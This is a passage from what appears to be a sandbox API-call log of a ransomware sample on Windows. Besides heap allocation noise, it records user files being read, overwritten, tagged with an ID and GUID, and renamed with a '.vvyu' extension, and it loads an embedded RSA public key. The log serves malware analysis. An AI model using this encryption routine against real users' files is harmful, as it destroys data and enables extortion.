(HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0187.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d778 [0187.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0187.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0187.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0187.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0187.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0187.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0187.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0187.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0187.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0187.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d898 | out: hHeap=0x2c0000) returned 1 [0187.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0187.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d778 | out: hHeap=0x2c0000) returned 1 [0187.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0187.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0187.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d838 | out: hHeap=0x2c0000) returned 1 [0187.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0187.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0187.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e8 | out: hHeap=0x2c0000) returned 1 [0187.979] GetCurrentThreadId () returned 0x5d8 [0187.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0187.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ede70 [0187.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0187.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0187.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0187.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0187.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0187.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0187.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.979] GetCurrentThreadId () returned 0x5d8 [0187.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0187.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0187.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d838 [0187.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d778 [0187.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0187.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0187.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d898 [0187.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0187.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0187.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0187.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d808 [0187.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0187.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d850 [0187.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0187.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0187.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0187.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d820 [0187.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0187.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7f0 [0187.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0187.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d868 [0187.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7f0 | out: hHeap=0x2c0000) returned 1 [0187.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d7f0 [0187.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d820 | out: hHeap=0x2c0000) returned 1 [0187.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0187.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0187.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0187.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0187.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0187.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d778 | out: hHeap=0x2c0000) returned 1 [0187.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d778 [0187.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0187.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2ae63e8 [0187.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d838 | out: hHeap=0x2c0000) returned 1 [0187.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0187.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d868 | out: hHeap=0x2c0000) returned 1 [0187.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2ae65f8 [0187.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0187.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0187.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0187.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0187.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d778 | out: hHeap=0x2c0000) returned 1 [0187.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2ae6810 [0187.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0187.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0187.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0187.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0187.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0187.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0187.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0187.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0187.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f8 | out: hHeap=0x2c0000) returned 1 [0187.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6810 | out: hHeap=0x2c0000) returned 1 [0187.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0187.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0187.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7f0 | out: hHeap=0x2c0000) returned 1 [0187.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0187.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d850 | out: hHeap=0x2c0000) returned 1 [0187.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0187.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d898 | out: hHeap=0x2c0000) returned 1 [0187.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d808 | out: hHeap=0x2c0000) returned 1 [0187.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0187.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0187.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0187.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7c0 | out: hHeap=0x2c0000) returned 1 [0187.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2188 | out: hHeap=0x2c0000) returned 1 [0187.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e8 | out: hHeap=0x2c0000) returned 1 [0187.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0187.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0187.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0187.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0187.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0187.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0187.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0187.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0187.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0187.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0187.990] WriteFile (in: hFile=0x584, lpBuffer=0x2ae3ea0*, nNumberOfBytesToWrite=0x253e, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae3ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x253e, lpOverlapped=0x0) returned 1 [0187.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0187.991] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2543, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.991] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0187.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0187.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0187.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2ae3ea0 [0187.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ae3ea0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2ae42d0 [0187.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0187.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0187.992] WriteFile (in: hFile=0x584, lpBuffer=0x2ae42d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae42d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0187.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae42d0 | out: hHeap=0x2c0000) returned 1 [0187.993] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.993] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0187.993] CloseHandle (hObject=0x584) returned 1 [0187.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0187.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2ae3ea0 [0187.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0187.995] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\2CgRhD9i_8EFMrM.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\2cgrhd9i_8efmrm.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\2CgRhD9i_8EFMrM.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\2cgrhd9i_8efmrm.png.vvyu")) returned 1 [0187.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0187.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0187.998] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.002] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65db15b0, ftCreationTime.dwHighDateTime=0x1d89980, ftLastAccessTime.dwLowDateTime=0x38eff3c0, ftLastAccessTime.dwHighDateTime=0x1d899f0, ftLastWriteTime.dwLowDateTime=0x38eff3c0, ftLastWriteTime.dwHighDateTime=0x1d899f0, nFileSizeHigh=0x0, nFileSizeLow=0x1fbc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3YV6ib1oIpsefRwtFe.pdf", cAlternateFileName="3YV6IB~1.PDF")) returned 1 [0188.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2188 [0188.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0188.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2188 | out: hHeap=0x2c0000) returned 1 [0188.002] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\3YV6ib1oIpsefRwtFe.pdf") returned=".pdf" [0188.002] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\3YV6ib1oIpsefRwtFe.pdf" (normalized: "c:\\users\\keecfmwgj\\desktop\\3yv6ib1oipsefrwtfe.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.003] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=8124) returned 1 [0188.003] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.006] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1f96, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.006] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.009] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.009] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x1fbc, lpOverlapped=0x0) returned 1 [0188.010] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.010] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.010] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.010] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.011] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.011] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.011] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.011] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.011] GetLastError () returned 0x0 [0188.011] SetLastError (dwErrCode=0x0) [0188.011] GetLastError () returned 0x0 [0188.012] SetLastError (dwErrCode=0x0) [0188.012] GetLastError () returned 0x0 [0188.012] SetLastError (dwErrCode=0x0) [0188.012] GetLastError () returned 0x0 [0188.012] SetLastError (dwErrCode=0x0) [0188.012] GetLastError () returned 0x0 [0188.012] SetLastError (dwErrCode=0x0) [0188.012] GetLastError () returned 0x0 [0188.012] SetLastError (dwErrCode=0x0) [0188.012] GetLastError () returned 0x0 [0188.012] SetLastError (dwErrCode=0x0) [0188.012] GetLastError () returned 0x0 [0188.012] SetLastError (dwErrCode=0x0) [0188.012] GetLastError () returned 0x0 [0188.012] SetLastError (dwErrCode=0x0) [0188.012] GetLastError () returned 0x0 [0188.012] SetLastError (dwErrCode=0x0) [0188.012] GetLastError () returned 0x0 [0188.012] SetLastError (dwErrCode=0x0) [0188.012] GetLastError () returned 0x0 [0188.012] SetLastError (dwErrCode=0x0) [0188.012] GetLastError () returned 0x0 [0188.012] SetLastError (dwErrCode=0x0) [0188.012] GetLastError () returned 0x0 [0188.012] SetLastError (dwErrCode=0x0) [0188.012] GetLastError () returned 0x0 [0188.013] SetLastError (dwErrCode=0x0) [0188.013] GetLastError () returned 0x0 [0188.013] SetLastError (dwErrCode=0x0) [0188.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.013] GetLastError () returned 